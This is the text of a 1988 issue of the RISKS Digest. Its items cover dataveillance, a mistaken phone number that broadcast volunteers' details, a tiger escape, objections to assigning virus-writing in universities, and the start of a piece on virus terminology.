The Risks Digest

The RISKS Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 7 Issue 4

Monday 6 June 1988

Contents

o Review article on privacy/civil liberties risks in CACM
Jon Jacky
o RISKS of wrong numbers and tigers
Steve Nuchia
o Academic Assignment of Viruses
Bill Murray
o Peter J. Denning on Terminology
Bill Kinnersley
o COMPASS '88 PROGRAM
Frank Houston
o Halon agreement and the ozone models
Rob Horn
o Info on RISKS (comp.risks)

Review article on privacy/civil liberties risks in CACM

Jon Jacky <jon@june.cs.washington.edu>
Sun, 05 Jun 88 17:32:33 PDT
Many readers of this digest will be interested in the article, "Information
technology and dataveillance," Roger A. Clarke, Communications of the ACM,
31(5): 498 - 512, May 1988.  This is a long review with 78 references.

The author defines "dataveillance" to mean the systematic use of computing
technology in the investigation or monitoring of the actions or 
communications of one or more persons.  He distinguishes betwen "personal
surveillance" - surveillance of an identified person, where there is a
specific reason for the investigation, and "mass surveillance" - surveillance
of large groups of people in order to identify individuals who might be of
interest to investigators.  The author concludes that computing technology
is making it much easier to perform both kinds, a lot of it is going on 
and more can be expected.  

The author says he does not argue that surveillance
is intrinsically evil or that it should be ruled out altogether, but 
argues that much of what is in fact now going on is in general a bad thing,
especially the mass surveillance.  He concludes that privacy and civil
liberties protections in place in most countries are inadequate to protect
against these new surveillance techniques.  The author says that he feels
people working in computing, due to their special knowledge, have some 
special responsibility to consider privacy implications of their work,
evaluate safeguards, and lobby for effective ones.

- Jon Jacky, University of Washington


RISKS of wrong numbers and tigers

Steve Nuchia <nuchat!steve@uunet.UU.NET>
4 Jun 88 18:32:45 GMT
(Paraphrased from The Houston Post, 29 April)

A local newscast carried a story on a Herpes research project under way at
Baylor College of Medicine, and displayed a phone number for volunteers to call
- with appropriate assurances of confidentiality.

Not only was it the wrong number, it was the number for the "back door" to the
public address system at Baylor (No indication of how large an area was covered
- it is a big place.)

The callers, hearing a pick up but no answer "assumed it was an answering
machine" and "gave their names, phone numbers, everything."

I believe this points up an important "human factor."  People are a lot less
cautious when they initiate a contact than when they are contacted.  This
explains the easy success of the typical "service spoof" attacks - password
harvesters and "night deposit box out of order" scams.  I don't have a magic
answer for designers of services - it is very hard to design a service that is
at all hard to spoof if the clients aren't at least a little bit cautious.


Second item:

One of the tigers went through a window in a door and killed an employee.  It
was at night and the public would not have been in immediate danger even in the
daytime, but the incident nevertheless caused quite a ruckus.

The firm that designed the enclosure stated that the door design, including the
window pane used, was "standard" for that kind of application.  The tiger had
no trouble going through it, and there was no indication that it was defective,
nor that any other tiger would have had any trouble going through any other
door of like design.

(Zoo officials have the big cats in holding cages while the window materials
used in the (relatively new) cat facility are tested - by swinging miniature
wrecking balls into them.  The cat facility is a modern close-contact one - you
can routinely find one of the lionesses sleeping against a window with the
public on the other side - in a tunnel.)

Apparently quite a few nominally professional people in the world think that
standards excuse them from thinking.  Perhaps that explains the popularity of
standards?

Applicability to computers?  Gee, there aren't any people clamoring for
standards in the computer industry, are there?

Steve Nuchia  uunet!nuchat!steve  (713) 334 6720

  [Yes, but we've always had tiger teams trying to break system security.  PGN]


Academic Assignment of Viruses

<WHMurray@DOCKMASTER.ARPA>
Sun, 5 Jun 88 10:25 EDT
A society that depends upon any mechanism for its own proper functioning,
cannot tolerate, much less encourage, any tampering with the intended
operation of that mechanism.

Therefore, one is tempted to rise up in indignation at the idea of a qualified
academic assigning a virus to his students.  The next thing you know, they will
be assigning plagiarism.  How about the forgery of academic credentials?
Perhaps we should offer a course in how to falsify research results.  Or,
perhaps, on how to trash another's experiments, notes or reports.

Perhaps it is a sign of immaturity that we are unable to recognize the moral
equivalency.  I will leave open the question of whether the immaturity is in
the technology, the society, or academia.

I thought that we put this issue to bed several years ago when we stopped
assigning the breaking of security.  It seems that we did not.

For an academic to be unable to recognize that assignments, and the recognition
that goes with their successful completion, encourages the behavior assigned,
demonstrates a lack of understanding of the activity in which he is engaged.
If he understands it, and still makes such an assignment, he demonstrates a
lack of understanding of where his real interest rests.

Such irresponsible behavior may account, in part, for the anti-academic bias in
our society and for the manifest distrust of the scientific establishment.  It
is of little wonder that the citizens of Cambridge, Massachusetts are reluctant
to trust the likes of these with genetic engineering.

If there is any lesson that we should have learned from the computer, it is
that understanding the effects of what we intend for it to do is a daunting
task.  Even getting it to do what we intend is not trivial.  It seems to me,
that there is plenty of material here for assignments; we need not look to
assignments which are at best trivial, and at worst, dangerous.

William Hugh Murray, Fellow, Information System Security, Ernst & Whinney
2000 National City Center Cleveland, Ohio 44114                          
21 Locust Avenue, Suite 2D, New Canaan, Connecticut 06840                


Peter J. Denning on Terminology

Bill Kinnersley <iphwk%MTSUNIX1.BITNET@CUNYVM.CUNY.EDU>
Mon, 6 Jun 88 12:02:13 mdt
        Subscribers to this list may be interested in the recent article
"Computer Viruses" by Peter J. Denning in the American Scientist, vol 76
page 236.  In particular, he discusses terminology.  Paraphrasing his
definitions:

1) Worm - a program that invades a workstation and disables it.